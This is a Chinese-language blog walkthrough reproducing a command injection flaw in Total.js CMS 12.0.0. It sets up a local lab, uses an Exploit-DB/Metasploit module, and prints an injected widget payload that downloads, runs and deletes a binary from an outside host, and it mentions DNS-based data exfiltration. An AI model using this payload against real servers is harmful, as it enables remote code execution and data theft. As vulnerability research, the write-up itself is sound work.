您好!欢迎来到北极熊

北极熊

热门搜索: 任正非传    神雕侠侣    红楼梦   

Total.js CMS 命令注入漏洞复现

分类:软件开发应用 时间:2019-12-16 14:03 浏览:679
概述
Total.js CMS 命令注入漏洞复现
内容

0X01 漏洞概述

 

Total.js CMS是一套基于NoSQL数据库的内容管理系统(CMS)。

 

Total.js CMS 12.0.0版本中存在命令注入漏洞,攻击者可利用该漏洞执行非法命令。

 

 

0X02环境搭建

 

方法一:下载源码

· 

· 

· 

https://my.totaljs.com/或者https://github.com/totaljs/cms

Windows下安装npm

· 

参考:https://blog.csdn.net/zhao1949/article/details/53907827

1.jpg 

到下载的Total.js CMS 12目录下

 npm install

 nodedebug.js 

2.jpg

 

· 

访问:http://127.0.0.1:8000/

1.jpg

· 

· 

· 

http://127.0.0.1:8000/admin/
默认账号密码:admin/admin

 

2.jpg

注意图标

 

 

1.jpg

 

0x03 漏洞利用

下载利用脚本

· 

https://www.exploit-db.com/exploits/47531

添加到msf中,访问

· 

http://192.168.0.169:8000/admin/widgets/

2.jpg 

这是植入的代码

· 

<scripttotal>global.process.mainModule.require('child_process').exec("sleep2;wget -qO /tmp/XrwHzcVK http://192.168.92.145:8080/p_BYrIw;chmod +x /tmp/XrwHzcVK;/tmp/XrwHzcVK;rm-f /tmp/XrwHzcVK");</script>

 

远程下载赋权执行然后删除。

1.jpg 

 

由于此处是windows系统,执行命令没有回显

2.jpg 

保存 去目录下发现了2.txt文件

1.jpg 

2.jpg 

可以结合DNS将数据外带出去。

此处使用ceye.io

1.jpg 

2.jpg 

 

0x04修复建议

打补丁。

 


评论
资讯正文页右侧广告
联系我们
电话:18936411277
邮箱:1044412291@qq.com
时间:09:00 - 19:00
公众号:北格软件
底部广告